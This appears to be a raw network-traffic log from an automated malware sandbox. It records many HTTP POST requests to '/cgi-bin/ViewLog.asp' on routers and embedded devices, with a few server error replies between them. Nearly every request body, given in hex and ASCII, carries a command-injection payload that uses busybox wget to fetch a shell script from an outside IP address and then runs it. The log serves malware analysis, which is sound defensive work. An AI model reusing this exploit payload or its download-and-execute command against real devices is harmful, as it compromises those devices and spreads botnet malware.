                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:01.876667976 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        402192.168.2.234190295.67.29.668080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:00.617033958 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        403192.168.2.233581495.66.217.1988080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:00.623716116 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:00.954571962 CEST274INHTTP/1.0 200 OK
                                                        Server: httpd/2.0
                                                        x-frame-options: SAMEORIGIN
                                                        x-xss-protection: 1; mode=block
                                                        Date: Sun, 14 Apr 2024 14:36:00 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 73 63 72 69 70 74 3e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 4d 61 69 6e 5f 4c 6f 67 69 6e 2e 61 73 70 27 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 48 45 41 44 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><script>top.location.href='/Main_Login.asp';</script></HEAD></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        404192.168.2.235872662.29.64.628080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:00.641019106 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        405192.168.2.235115094.121.31.1598080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:00.641093016 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        406192.168.2.233588831.40.224.468080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:00.643296957 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:01.722467899 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:02.071911097 CEST1289INHTTP/1.0 400 Bad Request
                                                        Server: squid/3.1.23
                                                        Mime-Version: 1.0
                                                        Date: Sun, 14 Apr 2024 14:05:14 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 3167
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b 0a 7d
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff;}


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        407192.168.2.233927862.238.217.638080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:01.270065069 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:01.582945108 CEST624INHTTP/1.1 500 Internal Error
                                                        Server: thttpd/2.25b 29dec2003
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Date: Sun, 14 Apr 2024 14:36:00 GMT
                                                        Last-Modified: Sun, 14 Apr 2024 14:36:00 GMT
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        Cache-Control: no-cache,no-store
                                                        Data Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 45 72 72 6f 72 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 32 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 45 72 72 6f 72 3c 2f 48 32 3e 0a 54 68 65 72 65 20 77 61 73 20 61 6e 20 75 6e 75 73 75 61 6c 20 70 72 6f 62 6c 65 6d 20 73 65 72 76 69 6e 67 20 74 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 27 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 27 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 74 68 74 74 70 64 2f 22 3e 74 68 74 74 70 64 2f 32 2e 32 35 62 20 32 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>500 Internal Error</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H2>500 Internal Error</H2>There was an unusual problem serving the requested URL '/cgi-bin/ViewLog.asp'.<HR><ADDRESS><A HREF="http://www.acme.com/software/thttpd/">thttpd/2.25b 29dec2003</A></ADDRESS></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        408192.168.2.235839631.136.149.1778080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:01.273188114 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:02.237124920 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:04.124775887 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:08.124156952 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:15.803191900 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:30.905067921 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:01.876651049 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        409192.168.2.235761894.110.111.1928080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:01.285804033 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:02.300990105 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        410192.168.2.233584095.66.217.1988080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:01.295053959 CEST334INHTTP/1.0 400 Bad Request
                                                        Server: httpd/2.0
                                                        x-frame-options: SAMEORIGIN
                                                        x-xss-protection: 1; mode=block
                                                        Date: Sun, 14 Apr 2024 14:36:00 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        411192.168.2.233990694.120.99.148080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:01.334892035 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        412192.168.2.235376294.120.106.1568080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:01.335207939 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        413192.168.2.235895495.0.130.318080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:01.335370064 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


